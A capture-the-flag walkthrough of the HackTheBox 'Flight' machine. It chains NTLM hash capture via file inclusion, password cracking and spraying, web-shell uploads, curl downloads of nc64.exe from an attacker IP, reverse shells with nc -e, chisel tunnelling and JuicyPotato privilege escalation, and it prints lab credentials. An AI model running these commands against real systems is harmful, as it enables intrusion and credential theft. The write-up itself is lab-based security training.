Flight from HackTheBox which involved Forced NTLM Authentication, getting svc_apache’s
hash, password spraying on the enumerated usernames will lead us to S.moon
which had write access to Shared
share allowing us to upload a desktop.ini
and again performing forecd authentication to get c.bum’s
hash, this user had access to web directory through smb allowing us to upload a php file giving us command execution as svc_apache, on enumerating local ports, port 8000 was running and hosting the directory from C:\inetpub\development
, on uploading an aspx file they returned us commands running in context of iis appol
, a service account which had SeImpersonate
privileged enabled which can be abused through Juicy-Potato to get system shell.
NMAP
Nmap scan report for 10.10.11.187
Host is up (0.28s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 139/445 (SMB)
Checking null authentication on SMB shows that we can’t access any share through anonymously
PORT 80 (HTTP)
The site didn’t had anything there as it was just a page with no links also gobuster
didn't showed anything interesting to as well
So adding flight.htb
in /etc/hosts
file as we can see the domain name at the bottom of the page
Fuzzing for subdomains using wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb" --hh 7069
Adding this subdomain in hosts file and accessing the site
Checking for Local File Inclusion it filters ..
if it's in the url but allows /
Foothold (Svc_apache)
Running wfuzz
again to fuzz for LFI payloads we find that we can just specify a file name without using ..
Let’s verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and use responder
to capture NTLMv2 hash
We have a hit so now running responder and accessing a fake share with //IP/share
responder -I tun0
http://school.flight.htb/index.php?view=//10.10.14.28/uwu
Saving this hash in a file cracking it with john
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
With the valid credentials we can start enumerating the shares and usernames through crackmapexec
Using enum4linux
to query usernames and filtering usernames so that we can password spray on them
enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt
S.moon
Using either cme or kerbrute to perform password spary we’ll get S.Moon
having the same password
kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
Checking shares with s.moon, we see that we have write access on `shared`
C.bum
On uploading .scf
file extension to perform forced authentication it didn't allowed us to upload that extension, not sure why
But on uploading desktop.ini
file it worked
[.ShellClassInfo]
IconResource=\\10.10.14.28\aa
Cracking this hash again with john
Foothold
This user has write access on web
share which means that we can upload php file which will be reflected on schooled.flight.htb
Uploading a php file calling phpinfo()
<?php phpinfo(); ?>
Having the ability to execute commands on the system we can get a reverse shell by uploading nc.exe and executing it
http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe
http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe
Since we already have credentials of c.bum
we can execute commands through that user using RunasC.exe
.\RunasCs.exe c.bum Tikkycoll_431012284 whoami
Running netstat, we’ll see that there’s port 8000 open locally
Port forwarding port 8000 using chisel
chisel server --reverse -p 8001
And running the client on the target machine
.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000
Accessing the port on our browser shows that access is denied
But this shows the path where the directory is hosted, C:\inetpub\Development
In this folder, there are few html files
Running icacls
on the development folder shows that c.bum
has write access
Using RunasCs
we can switch user as c.bum and transfer aspx shell in that directory
.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'
Accessing the file through the browser
I tried executing nc.exe to get a reverse shell but it wasn’t working for some reason so instead I generated a msfvenom payload
Transfer it and execute it
On checking privileges of iis appol
, SeImpersonate
was enabled
To abuse this, we can use JuicyPotato-ng
to get a system shell
.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"